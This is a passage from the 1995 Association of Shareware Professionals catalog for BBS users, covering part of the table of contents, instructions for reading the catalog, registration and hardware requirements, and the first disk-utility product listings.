. . . . . . . . . . . . . . 368 + 7.10 Forms generators . . . . . . . . . . . . . 369 + 7.10.1 Forms fillers . . . . . . . . . . . . 371 + 7.10.2 Forms processing . . . . . . . . . . 372 + 7.11 Sales aids . . . . . . . . . . . . . . . . 372 + 7.12 Marketing . . . . . . . . . . . . . . . . 373 + 7.13 Work-at-home . . . . . . . . . . . . . . . 375 + 7.14 Training & support aids . . . . . . . . . 376 + 7.14.1 Lecturing & slide shows . . . . . . . 377 + 7.14.2 Job interviewing . . . . . . . . . . 379 + 7.14.3 "Help desk" applications . . . . . . 379 + 7.15 Simulators & what-ifs . . . . . . . . . . 379 + 7.16 Business utilities . . . . . . . . . . . . 380 + 7.16.1 Weights & measurements . . . . . . . 382 + 7.17 Software tools & add-ins . . . . . . . . . 383 + 7.17.1 For multiple programs . . . . . . . . 383 + 7.17.2 For other . . . . . . . . . . . . . . 383 + 7.18 Other . . . . . . . . . . . . . . . . . . 385 + + Chapter 8: Finances 386 + 8.1 Stock trading & analysis . . . . . . . . . 386 + 8.2 Personal finances . . . . . . . . . . . . . 389 + 8.2.1 Finances & budgets . . . . . . . . . . 393 + 8.2.2 Checkbook managers . . . . . . . . . . 397 + 8.3 Portfolio management . . . . . . . . . . . 400 + 8.4 Financial calculators . . . . . . . . . . . 402 + 8.5 Income tax preparation . . . . . . . . . . 404 + 8.6 Finance utilities . . . . . . . . . . . . . 404 + + Chapter 9: Engineering 407 + 9.1 Civil engineering . . . . . . . . . . . . . 407 + 9.2 Electrical engineering . . . . . . . . . . 407 + 9.3 Industrial engineering . . . . . . . . . . 409 + 9.4 Mechanical engineering . . . . . . . . . . 409 + 9.5 Structural analysis . . . . . . . . . . . . 411 + 9.6 Surveying & cartography . . . . . . . . . . 411 + 9.7 Engineering utilities . . . . . . . . . . . 412 + 9.7.1 File format translators . . . . . . . 415 + 9.8 Software tools & add-ins . . . . . . . . . 415 + 9.8.1 For multiple programs . . . . . . . . 415 + 9.8.2 For other . . . . . . . . . . . . . . 415 + 9.9 Other . . . . . . . . . . . . . . . . . . . 416 + + Chapter 10: Communications 418 + 10.1 General-purpose modem communications . . . 418 + 10.2 Service-specific programs . . . . . . . . 421 + 10.2.1 For CompuServe . . . . . . . . . . . 421 + 10.2.2 For GEnie . . . . . . . . . . . . . . 422 + 10.2.3 For Internet . . . . . . . . . . . . 423 + 10.3 Bulletin boards . . . . . . . . . . . . . 423 + 10.3.1 Bulletin board utilities . . . . . . 425 + 10.4 Networks . . . . . . . . . . . . . . . . . 426 + 10.4.1 Modem-based networks . . . . . . . . 433 + 10.4.2 Network utilities . . . . . . . . . . 433 + + vi + + + + 10.5 Remote computer access . . . . . . . . . . 436 + 10.6 Fax machines & fax cards . . . . . . . . . 437 + 10.7 Voice mail systems . . . . . . . . . . . . 438 + 10.8 Call logging & analysis . . . . . . . . . 438 + 10.8.1 Phone bill analyzers . . . . . . . . 439 + 10.9 File transfer protocols . . . . . . . . . 439 + 10.10 Communication utilities . . . . . . . . . 440 + 10.10.1 File format translators . . . . . . 441 + 10.11 Software tools & add-ins . . . . . . . . 441 + 10.11.1 For multiple programs . . . . . . . 441 + 10.11.2 For TAPCIS . . . . . . . . . . . . . 442 + 10.11.3 For PCBoard . . . . . . . . . . . . 442 + 10.11.4 For Qmodem . . . . . . . . . . . . . 442 + 10.11.5 For OzCIS . . . . . . . . . . . . . 442 + 10.11.6 For other . . . . . . . . . . . . . 442 + 10.12 Other . . . . . . . . . . . . . . . . . . 443 + + Chapter 11: Mathematics 444 + 11.1 General math . . . . . . . . . . . . . . . 444 + 11.2 Statistics . . . . . . . . . . . . . . . . 445 + 11.3 Function & curve plotting . . . . . . . . 448 + 11.4 Mathematical utilities . . . . . . . . . . 449 + + Chapter 12: Computer programming 451 + 12.1 CASE tools . . . . . . . . . . . . . . . . 451 + 12.2 Database engines . . . . . . . . . . . . . 451 + 12.3 Debuggers . . . . . . . . . . . . . . . . 453 + 12.4 Languages . . . . . . . . . . . . . . . . 454 + 12.4.1 Assembler . . . . . . . . . . . . . . 454 + 12.4.2 BASIC . . . . . . . . . . . . . . . . 456 + 12.4.2.1 Visual BASIC . . . . . . . . . . 459 + 12.4.3 C . . . . . . . . . . . . . . . . . . 469 + 12.4.3.1 C++ . . . . . . . . . . . . . . 477 + 12.4.4 COBOL . . . . . . . . . . . . . . . . 478 + 12.4.5 Pascal . . . . . . . . . . . . . . . 478 + 12.4.5.1 OOP Pascal for DOS (Borland) . . 481 + 12.4.6 Other . . . . . . . . . . . . . . . . 481 + 12.5 Hypertext/hypermedia . . . . . . . . . . . 481 + 12.6 Tutorials . . . . . . . . . . . . . . . . 483 + 12.7 Software installation aids . . . . . . . . 484 + 12.8 Software testing aids . . . . . . . . . . 489 + 12.9 Programming utilities . . . . . . . . . . 490 + 12.9.1 Desktop tools for programmers . . . . 492 + 12.9.2 `Help' utilities . . . . . . . . . . 494 + 12.10 Software tools & add-ins . . . . . . . . 495 + 12.10.1 For multiple programs . . . . . . . 495 + 12.10.2 For other . . . . . . . . . . . . . 495 + + Chapter 13: Education 498 + 13.1 Preschool . . . . . . . . . . . . . . . . 498 + 13.2 Elementary . . . . . . . . . . . . . . . . 502 + 13.3 Junior high . . . . . . . . . . . . . . . 513 + 13.4 High school . . . . . . . . . . . . . . . 515 + 13.5 College . . . . . . . . . . . . . . . . . 518 + + vii + + + + 13.6 Library/bibliography . . . . . . . . . . . 520 + 13.7 Teachers . . . . . . . . . . . . . . . . . 523 + 13.7.1 Gradebooks . . . . . . . . . . . . . 526 + 13.8 Computers . . . . . . . . . . . . . . . . 527 + 13.8.1 Computer hardware tutors . . . . . . 528 + 13.8.2 Operating system tutors . . . . . . . 528 + 13.8.3 Typing tutors . . . . . . . . . . . . 530 + 13.8.4 Educational computer games . . . . . 530 + 13.9 Foreign language . . . . . . . . . . . . . 531 + 13.10 Geography . . . . . . . . . . . . . . . . 535 + 13.11 History . . . . . . . . . . . . . . . . . 536 + 13.12 Literature . . . . . . . . . . . . . . . 539 + 13.13 Math . . . . . . . . . . . . . . . . . . 540 + 13.14 Music . . . . . . . . . . . . . . . . . . 540 + 13.15 Science & ecology . . . . . . . . . . . . 542 + 13.16 Writing . . . . . . . . . . . . . . . . . 545 + 13.17 Software tools & add-ins . . . . . . . . 547 + 13.17.1 For other . . . . . . . . . . . . . 547 + 13.18 Other . . . . . . . . . . . . . . . . . . 547 + + Chapter 14: Graphics 548 + 14.1 Viewing programs . . . . . . . . . . . . . 548 + 14.2 Drawing/editor programs . . . . . . . . . 551 + 14.3 Paint programs . . . . . . . . . . . . . . 556 + 14.3.1 Graphics diversions . . . . . . . . . 558 + 14.4 Presentation graphics . . . . . . . . . . 560 + 14.4.1 Animation applications . . . . . . . 561 + 14.4.1.1 "Morphing" applications . . . . 563 + 14.5 CAD/CAM applications . . . . . . . . . . . 563 + 14.5.1 Vector/ray tracing . . . . . . . . . 567 + 14.6 Business applications . . . . . . . . . . 568 + 14.6.1 OCR applications . . . . . . . . . . 570 + 14.6.2 Mapping/cartography . . . . . . . . . 571 + 14.7 Ready-made graphic images . . . . . . . . 572 + 14.7.1 Multi-format images . . . . . . . . . 572 + 14.7.2 BMP images . . . . . . . . . . . . . 573 + 14.7.3 PCX images . . . . . . . . . . . . . 573 + 14.7.4 WPG images . . . . . . . . . . . . . 573 + 14.7.5 Other formats . . . . . . . . . . . . 573 + 14.8 Utilities . . . . . . . . . . . . . . . . 574 + 14.8.1 Cataloging tools . . . . . . . . . . 574 + 14.8.2 Graphic screen capture . . . . . . . 575 + 14.8.3 Graphic print screen . . . . . . . . 576 + 14.8.4 File format translators . . . . . . . 577 + 14.9 Software tools & add-ins . . . . . . . . . 578 + 14.9.1 For multiple programs . . . . . . . . 578 + 14.9.2 For AutoCAD . . . . . . . . . . . . . 578 + 14.9.3 For other . . . . . . . . . . . . . . 578 + + Chapter 15: Home & hobby 579 + 15.1 Arts & crafts . . . . . . . . . . . . . . 579 + 15.2 Astronomy . . . . . . . . . . . . . . . . 580 + 15.3 Computers . . . . . . . . . . . . . . . . 583 + 15.4 Collecting . . . . . . . . . . . . . . . . 584 + + viii + + + + 15.5 Fortune telling & astrology . . . . . . . 592 + 15.6 Gambling . . . . . . . . . . . . . . . . . 599 + 15.7 Gardening . . . . . . . . . . . . . . . . 601 + 15.8 Genealogy . . . . . . . . . . . . . . . . 602 + 15.8.1 Pedigrees . . . . . . . . . . . . . . 605 + 15.9 Ham radio . . . . . . . . . . . . . . . . 606 + 15.10 Health . . . . . . . . . . . . . . . . . 608 + 15.10.1 Food/dietary/kitchen . . . . . . . . 608 + 15.10.2 Exercise/fitness . . . . . . . . . . 614 + 15.11 Household automation . . . . . . . . . . 615 + 15.12 How-to projects . . . . . . . . . . . . . 618 + 15.13 Hunting & fishing . . . . . . . . . . . . 618 + 15.14 Lottery . . . . . . . . . . . . . . . . . 623 + 15.15 Movies & video tapes . . . . . . . . . . 625 + 15.16 Music . . . . . . . . . . . . . . . . . . 626 + 15.17 Personalities . . . . . . . . . . . . . . 634 + 15.17.1 Diaries & journals . . . . . . . . . 635 + 15.18 Photography . . . . . . . . . . . . . . . 636 + 15.19 Planes, trains & automobiles . . . . . . 636 + 15.20 Quotes & anecdotes . . . . . . . . . . . 636 + 15.21 Reading (and writing, too) . . . . . . . 637 + 15.22 Scouting . . . . . . . . . . . . . . . . 637 + 15.23 Self development . . . . . . . . . . . . 641 + 15.24 Sports . . . . . . . . . . . . . . . . . 642 + 15.24.1 Betting pools . . . . . . . . . . . 642 + 15.24.2 Handicapping . . . . . . . . . . . . 642 + 15.24.2.1 For `the ponies' . . . . . . . 643 + 15.24.2.2 For other . . . . . . . . . . . 644 + 15.24.3 Baseball/softball . . . . . . . . . 644 + 15.24.4 Basketball . . . . . . . . . . . . . 646 + 15.24.5 Boating sports . . . . . . . . . . . 647 + 15.24.6 Firearms . . . . . . . . . . . . . . 648 + 15.24.7 Football . . . . . . . . . . . . . . 649 + 15.24.8 Golf . . . . . . . . . . . . . . . . 651 + 15.24.9 Martial arts . . . . . . . . . . . . 652 + 15.24.10 Soccer/rugby . . . . . . . . . . . 652 + 15.24.11 Other . . . . . . . . . . . . . . . 652 + 15.25 Travel . . . . . . . . . . . . . . . . . 653 + 15.26 Software tools & add-ins . . . . . . . . 654 + 15.26.1 For other . . . . . . . . . . . . . 654 + 15.27 Other . . . . . . . . . . . . . . . . . . 654 + + Chapter 16: Religion & philosophy 655 + 16.1 The Bible . . . . . . . . . . . . . . . . 655 + 16.1.1 Bible programs . . . . . . . . . . . 656 + 16.2 For houses of worship . . . . . . . . . . 656 + 16.3 New age/occult . . . . . . . . . . . . . . 658 + 16.4 Philosophy . . . . . . . . . . . . . . . . 660 + 16.4.1 Metaphysics . . . . . . . . . . . . . 660 + 16.5 Software tools & add-ins . . . . . . . . . 661 + 16.5.1 For other . . . . . . . . . . . . . . 661 + 16.6 Other . . . . . . . . . . . . . . . . . . 661 + + ix + + + + Chapter 17: Games 662 + 17.1 Adventure . . . . . . . . . . . . . . . . 662 + 17.2 Arcade games . . . . . . . . . . . . . . . 664 + 17.3 Board games . . . . . . . . . . . . . . . 667 + 17.3.1 Backgammon . . . . . . . . . . . . . 667 + 17.3.2 Mahjong . . . . . . . . . . . . . . . 668 + 17.3.3 Other . . . . . . . . . . . . . . . . 669 + 17.4 Card games . . . . . . . . . . . . . . . . 671 + 17.4.1 Solitaire . . . . . . . . . . . . . . 673 + 17.5 Non-card games . . . . . . . . . . . . . . 675 + 17.5.1 Solitaire . . . . . . . . . . . . . . 675 + 17.6 Casino games . . . . . . . . . . . . . . . 677 + 17.7 Jokes & humor . . . . . . . . . . . . . . 679 + 17.8 Logic & brain games . . . . . . . . . . . 680 + 17.9 Practical jokes . . . . . . . . . . . . . 683 + 17.10 Puzzles, mix & match . . . . . . . . . . 683 + 17.11 Sayings & stories . . . . . . . . . . . . 688 + 17.12 Simulators . . . . . . . . . . . . . . . 688 + 17.12.1 Sports . . . . . . . . . . . . . . . 689 + 17.13 Star Trek & Star Wars . . . . . . . . . . 690 + 17.14 Strategy/simulation . . . . . . . . . . . 691 + 17.14.1 War games . . . . . . . . . . . . . 697 + 17.15 Trivia . . . . . . . . . . . . . . . . . 699 + 17.16 Word games . . . . . . . . . . . . . . . 700 + 17.16.1 Crossword puzzles . . . . . . . . . 706 + 17.16.2 Cryptanalysis . . . . . . . . . . . 708 + 17.16.3 Word search . . . . . . . . . . . . 709 + 17.17 For adults . . . . . . . . . . . . . . . 709 + 17.18 Game utilities . . . . . . . . . . . . . 710 + 17.19 Other . . . . . . . . . . . . . . . . . . 710 + + Chapter 18: About shareware 711 + 18.1 Assn. Shareware Professionals . . . . . . 711 + 18.2 For shareware authors . . . . . . . . . . 715 + 18.3 For shareware disk vendors . . . . . . . . 715 + 18.4 Software tools & add-ins . . . . . . . . . 716 + 18.4.1 For multiple programs . . . . . . . . 716 + + Chapter 19: Other 717 + 19.1 Software tools & add-ins . . . . . . . . . 717 + 19.1.1 For multiple programs . . . . . . . . 717 + 19.1.2 For other . . . . . . . . . . . . . . 717 + 19.2 Other . . . . . . . . . . . . . . . . . . 717 + + + Part 2: Appendixes + + + Appendix A: Author addresses 719 + + Appendix B: Vendor addresses 783 + + Appendix C: Bulletin Boards 806 + + x + + + + Appendix D: Retired shareware 840 + + Appendix E: Sorted list of all programs 844 + + Appendix F: Supporting Members 868 + + Index 869 + + ASP Catalog for BBS Users (Master Edition) 2 + + + + + + + + ASP Shareware Catalog for BBS Users (Master Edition) + th st + 4 volume, 21 edition + Published September 2, 1995 + + Copyright 1995 by the Association of Shareware Professionals + (ASP), a non-profit organization; all rights reserved. Any + specific hardware/software names used in this catalog are the + (registered) trademarks of specific companies. Individuals, + bulletin board systems, national information systems, non-profit + organizations, and government agencies may freely distribute this + document in electronic form. For-profit disk vendor companies + may distribute this document in electronic form if they have an + ASP associate membership and if they charge only their normal + distribution fees. All others must obtain prior written per- + mission from the Association of Shareware Professionals. Write + to the ASP at 545 Grover Road, Muskegon, MI 49442. + + The programs & services described in this catalog come from + members of the Association of Shareware Professionals. This + catalog may not list every ASP-member product and it may not be + current. Send all comments about the catalog to the above + address, or to CompuServe userID 70007,4004, or as a message in + the CompuServe SHAREWARE forum. + + ASP strives to produce accurate catalogs BUT this publication may + contain any number of typographical, graphical, printing, or + interpretation errors. + + "These programs are produced by members of the Associa- + tion of Shareware Professionals (ASP). ASP wants to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at 545 + Grover Road, Muskegon, MI 49442 or send a Compuserve + message via Compuserve Mail to ASP Ombuds- + man 70007,3536". The Ombudsman may be contacted by FAX + by sending to the ASP FAX number: (616) 788-2765. In + communication with the Ombudsman please include a tele- + phone number and/or FAX if available. + + Please write to the ASP at the above address if you have any + comments or questions about this catalog. + + ASP Catalog for BBS Users (Master Edition) 3 + + + + + + Chapter 1 + How to read this catalog + + ASP members have supplied product descriptions for each shareware + application they offer. The catalog groups them by subject + matter and lists them alphabetically. If you want to know the + name/address/phone for the author of a particular program, turn + to the index and look for the program by name. You'll usually + see two page references: one describes the page where you read + about the program, the other mentions the page where you can find + information about the author (in Appendix A). Just turn to the + appropriate page and scan for the name of the program. + + The Association of Shareware Professionals does NOT rate members' + software for functionality or usefulness, nor can it attest to + the validity of any product description in this catalog. That is + for you - the user - to decide. Shareware, especially those + products authorized to carry the ASP logo, can be tested on a + "try before you buy" basis. If the software doesn't meet your + needs, you won't have to worry about getting a refund. (That's + the beauty of the shareware marketing concept.) + + + 1.1 Minimum requirements + + Every program description lists its computer and operating system + requirements (e.g. "IBM PC, DOS 2.0 or better"). Unless noted + otherwise, each program assumes you have a standard keyboard, + monitor, printer, and either two floppy drives or a hard disk. + And unless noted otherwise, programs written for the IBM PC + assume you have at least 512k of total installed RAM. Many pro- + grams may also need specific hardware or software such as: + CD-ROM drive + A device capable of reading CD-ROMs. A CD-ROM + looks just like a regular compact disk with music + on it, but it has information on it only a + computer's CD-ROM drive can read. + CGA monitor A video monitor capable of displaying CGA + graphics. This includes most "laptop CGA" + computers, plus higher resolution monitors such as + the EGA or VGA. Some (but not all) of the + described programs may operate correctly with a + Hercules monitor if you use a "CGA simulator" + program; consult your video monitor manual for + details. + Dual 720k disk drives + At least two floppy drives capable of writing at + least 720k of data per disk, or, preferably, a + hard disk (see below). + + ASP Catalog for BBS Users (Master Edition) 4 + + + + EGA monitor A video monitor capable of displaying EGA + graphics. This almost always includes VGA and + other higher-resolution monitors. CGA and + Hercules monitors won't suffice. + EMS memory Memory accessible via the Lotus-Intel-Microsoft + Expanded Memory Specification. Not to be confused + with expanded memory, extended memory, or XMS + memory (see below). Windows, OS/2, and newer + versions of DOS come with software designed to + implement EMS memory on computers with enough + installed memory. + Epson printer + A printer capable of recognizing the Epson print + command set (an industry standard). Some + printers, including some laser printers, have + options to behave like an Epson printer. Some + programs may require a specific model such as the + Epson MX-80 or FX-100. + Hard disk A fixed-, removable-, or network-drive device + capable of storing multiple megabytes of data. + Some programs also assume you have at least one + floppy drive in addition to the hard disk. + Hercules monitor + A video monitor capable of displaying Hercules + graphics. CGA, EGA, VGA, & SVGA monitors won't + suffice. + HP DeskJet A Hewlett-Packard DeskJet or compatible printer. + Some programs may require a DeskJet starting with + a specific model such as the DeskJet Plus or + having a specific feature like a RAM cartridge. + HP LaserJet A Hewlett-Packard LaserJet or compatible printer. + (HP DeskJet printers recognize most, but not all, + of the HP LaserJet command set.) Some programs + may require a specific model such as the LaserJet + II or with a specific feature like the LaserJet + IIIDSi. + Math coprocessor + An IBM PC or compatible computer with an installed + math coprocessor unit. Commonly referred to as an + "80x87 chip," these include the 8087, 80287, and + 80387 coprocessors. (80486- and Pentium-based + computers have math coprocessors by default.) + Most 8086-, 80286-, and 80386-based IBM PCs & + compatibles have no installed math coprocessor by + default. (80286- and 80386-based computers can + accept a math coprocessor if you purchase one.) + Modem A modem. Almost all programs work with a "Hayes + compatible" modem, specifically one able to + recognize the Hayes command set (an industry + standard). A few programs claim to work with non- + Hayes modems too. Some programs may require the + modem to operate at a specific rate of speed (e.g. + "1200 baud"). + Mouse A Logitec- or Microsoft-compatible mouse. + + ASP Catalog for BBS Users (Master Edition) 5 + + + + Network A computer hooked up a local area network (LAN). + Program descriptions will normally specify the + different types of LAN systems under which they + can operate. + Plotter A plotter output device. Many of the described + programs need a plotter able to recognize the HPGL + (Hewlett Packard Graphics Language) command set. + PostScript printer + A printer able to interpret the PostScriptr + command set. Many printers (including the HP + LaserJet series) offer PostScript compatibility + via plug-in cartridges. Software also exists to + emulate PostScript on hundreds of popular + printers. + SVGA monitor + A video monitor capable of displaying SVGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, VGA, and Hercules + monitors won't suffice. + Streaming tape device + A device capable of reading streaming tapes. Also + referred to as a "tape backup device." Streaming + tapes look something like a standard music + cassette or videocassette, but it holds + information only a computer can read. Common + streaming tapes include DC600, DC2000, DC2120; + tape storage formats include QIC-40 and QIC-80. + VGA monitor A video monitor capable of displaying VGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, and Hercules + monitors won't suffice. + XMS memory Memory accessible via the Lotus-Intel-Microsoft + eXtended Memory Specification. Not to be confused + with expanded memory, extended memory, or EMS + memory (see above). Windows, OS/2, and newer + versions of DOS come with software designed to + implement XMS memory on computers with enough + installed memory. + + + 1.2 Registration benefits + + All ASP member shareware products come with certain minimum + benefits when you register. The author must acknowledge your + registration (you don't just get a canceled check) and must + provide a minimum amount of technical support for at least three + months. + + Many authors provide other registration benefits such as a + printed manual, a master disk, a year of unlimited phone support, + source code, etc. The product description will mention them when + appropriate. + + ASP Catalog for BBS Users (Master Edition) 6 + + + + In addition, every ASP member can offer the following benefits to + registered customers: + + CompuServe + IntroPak obtain an introductory membership to the Compu- + Serve network with a $15 usage credit when you + register an ASP member's shareware product. + + Many authors include this information when they acknowledge + registrations. Contact the author if you need assistance. + + Some authors add "registration reminder screens" to the shareware + version of a program as a way to gently remind people to + register. (The ASP sets ethical standards regarding it.) Almost + all authors will either send a copy of the program without + reminder screens, or will disclose a method to disable the + reminders, once you register the product. + + + 1.3 Sample product description + + This sample description will help you understand what each field + means: + + Product: Shareware Program Name [***] + A "[***]" across from the product name indicates a new or + updated description since the last catalog. + Author: name & phone number of the person or company offering + this product. See Appendix A for detailed information about + the person or company. + Version: version number (release date) + Needs: computer type [IBM PC, IBM 80386, Macintosh, etc.], + operating system, and version number. May also describe other + needed or recommended hardware & software. See above for more + details. + Registration fee: The cost of a single user license, expressed + in U.S. currency unless otherwise noted. Many authors provide + "multi-tier" registrations, and you may pay a little more or + less than the amount stated here depending on your situation. + (You can often save money by "reading the fine print.") Some + authors include shipping & handling fees in the prices while + others don't. Most authors offer network, site, and corporate + licenses for a higher fee; please contact the author in + question for details and price quotes. + SWREG#: applies only to CompuServe users. You can register this + product on CompuServe and have the cost added to your service + bill. This method of payment proves especially useful for (1) + overseas users who don't have a credit card accepted by the + author; and (2) business customers who find it easier to + register shareware by tacking the fee onto a corporate- + + ASP Catalog for BBS Users (Master Edition) 7 + + + + sponsored CompuServe account. CompuServe users should GO + CIS:SWREG for more details. + PsL#: you can register this product via the Public (software) + Library, and you can pay for it with your MasterCard, Visa, + American Express, Optima, or Discover card. Call (800) + 242-4775, have your credit card handy, and have the product's + PsL registration number handy. (Overseas customers should call + U.S. 713-524-6394.) Or if you want to fax your shareware + purchase order to PsL, fax it to (713) 524-6398. + Registration benefits: Describes the benefits you get for regis- + tering the software. All ASP shareware programs come with cer- + tain minimum benefits (see above for details). + Look for: FILENAME.EXT on BBSs (call xxx-xxx-xxxx to download it + at no charge); FNAME.EXT in GATE:FORUM forum LIB 9 on Compu- + Serve (or contact userID 78901,2345 for assistance); FILE- + NAME.EXT in ROUNDTABLE RTC LIB 9 on GEnie (or contact userID + J.QAUTHOR for assistance). + Download size: the size of the file(s) to download, in + kilobytes. A 2400 baud modem can download about 14 kilobytes + per minute under normal conditions. + Special instructions: tells if the author limits product + distribution to the United States. In some cases the author or + company may have signed a contract forbidding worldwide share- + ware distribution. In other cases the product may only appeal + to an American audience (income tax software for example). In + rare cases, U.S. federal laws may actually prohibit the author + or company from distributing the product in other countries. + Editor's note: the catalog editor may append text of his own if + something needs further explanation. + Description: a paragraph or two of text which describes the + shareware product in detail. This information comes direct + from the author or company behind the program. + + Chapter 1, "Shareware Products" 8 + + + + + + + + + + + + + + + + + + + + PART 1 + Shareware Products + + Chapter 2, "Utilities" 9 + + + + + + Chapter 2 + Utilities + + + 2.1 Disk utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 120. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 120. + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 121. + + Product: C-Menu/32 + A stunning easy 32-bit VGA menuing system. See full + description on page 184. + + Product: Directory Freedom + Author: Bit Masons Consulting, 508-898-3321 + Version: 4.61 (06-03-93) + Needs: IBM PC, DOS 3.3 or better. 192k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, BBS, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: DF461.ZIP on BBSs (call 508-875-3618 to download it at + no charge); DF461.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 5 (or contact userID 72561,2637 for assistance). + Download size: 235k (about 18 minutes with a 2400 baud modem) + Description: + A fast, compact alternative to DOS Shells which goes far beyond + just letting you copy, move, and delete files. You also get + things like user-defined menus and SmartViewers to integrate + external programs, a system information screen, and much much + more. All this in a program less than 35kb in size since it is + written in assembler! Easily customized through an external + configuration program. A great companion for PC compatibles of + any size and users from novice to expert. + + Chapter 2, "Utilities" 10 + + + + Product: DRIVEMAP + Author: Oxford House Software + Version: 1.2 (08-01-94) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DMAP12.ZIP on CompuServe + in CIS:QUARTERDEC forum LIBrary 0. + Download size: 5k (about one minute with a 2400 baud modem) + Description: + Display information about disk drives on your PC. Identifies + floppy, fixed, network, removable, Stacker and COMpanion + drives, as well as ASSIGN, JOIN and SUBST drive mappings. Works + under DESQview. + + + Product: Easy Install + Creates instant distribution disks. See full description on + page 486. + + Product: FileFinder + Author: California Software Design, 707-575-9868 + Version: 4.4 (09-20-93) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; Hard disk. + Optionally uses LIST, QEDIT, Shez, and word processor. + Registration fee: $25.00 + Registration benefits: 3 months of unlimited BBS, CompuServe, + GEnie, mail support; bonus utilities. Lifetime free upgrading + allowed. + Look for: FFF44.ZIP on BBSs (call 714-636-2667 to download it at + no charge); FFF44.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 76266,2634 for assistance); FFF44.ZIP on + GEnie in IBMPC forum LIBrary 0 (or contact userID J.DERR1 for + assistance). + SWREG#: 271 + Download size: 163k (about twelve minutes with a 2400 baud modem) + Description: + Helps you find files and directories on any hard disk attached + to your PC, including network attached drives. Numerous search + options are available, including the ability to search for + files using an expanded wild card specification. I.E. "*PRO*" + will find all files that have the letters PRO anywhere in the + file name. A command line version and a full screen version + are both included. The full screen version will search for + duplicate files, allows you to launch programs, perform fuzzy + searches. + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 206. + + Chapter 2, "Utilities" 11 + + + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 75. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 206. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 38. + + Product: QuickDir + Author: SUPERWARE, 203-723-0014 + Version: 1.32 (11-16-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: Mouse; Network (LAN). + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. 1 free update + disk(s) sent out. + Look for: QDIR132.ARJ on BBSs (call 203-753-9205 to download it + at no charge); QUICKD.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 5 (or contact userID 71564,725 for assistance). + Download size: 133k (about ten minutes with a 2400 baud modem) + Description: + A must-have for maintaining your hard and networked drives. + Features an instantly displayed, multiple drive directory tree + you can customize. Over 50 DOS functions, including 'auto + verify' copy for diskettes. Easily graft or eliminate a + directory branch. Tag files for copy or move. Simple 2 key Zip, + Arj archive extract. Uses your own editor or list program. Find + duplicate, archive or any file. Delete or copy them easily. + Amazingly small (107k), fast, and a joy to use. + + Chapter 2, "Utilities" 12 + + + + Product: SAFEPACK + Author: D J Harvey Software + Version: 1.5 (03-08-93) + Needs: IBM PC, DOS 2.0 or better. 100k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $16.00 + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 24 + months of unlimited fax, CompuServe, mail support. Lifetime + free upgrading allowed. 1 free update disk(s) sent out. + Look for: SAFPAK15.ZIP on BBSs; SAFPAK.ZIP on CompuServe in + CIS:IBMHW forum LIBrary 1 (or contact userID 100031,627 for + assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + This disk defragmenter for MSDOS up to 5.0 and DR DOS up to 6.0 + is designed so that the data on the disk should be immune to + any interruptions to the program, whether due to user + interrupt, machine failure, or even a power cut. + + Numerous options allow files and directories to be sorted into + almost any order, and many other optimizations are possible. It + may be run in unattended mode, allowing use in batch files. + Works on any standard DOS Disk, irrespective of media, + including OS/2 FAT volumes. + + + Product: Shez + Program shell for managing compressed files. See full + description on page 52. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 134. + + Product: STEENBURGH's STUFF + 21 batch utilities, input, output, etc. See full description + on page 130. + + Product: WizManager + Fantastic File Manager add-on. See full description on + page 195. + + 2.1.1 Disk cataloging + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 219. + + Product: Disk Piecharter + Graphical File Manager extension. See full description on + page 16. + + Chapter 2, "Utilities" 13 + + + + Product: DISKLIST + Diskette cover & label producer - 39 formats. See full + description on page 28. + + Product: DiskMan for Windows + Author: Diskmaster Software, 410-418-8825 + Version: 2.1 (04-01-93) + Needs: IBM PC, Windows 3.0 or better. 200k RAM. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe support; + 3-month return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DSKM21.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 9 (or contact userID 73507,3505 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides the most user friendly method to catalog floppy disks, + hard drives, bernoullis, etc. Produces professional quality + disk labels including optional graphics and also produces an + array of library reports. Full font support, file comments, + NDOS file comment compatibility, disk comments, archive + extraction, and now imports Catdisk files. "I have not found a + commercial program that comes close." + + + Product: DizView + View FILE_ID.DIZ files in all your ZIPs. See full description + on page 36. + + Product: File 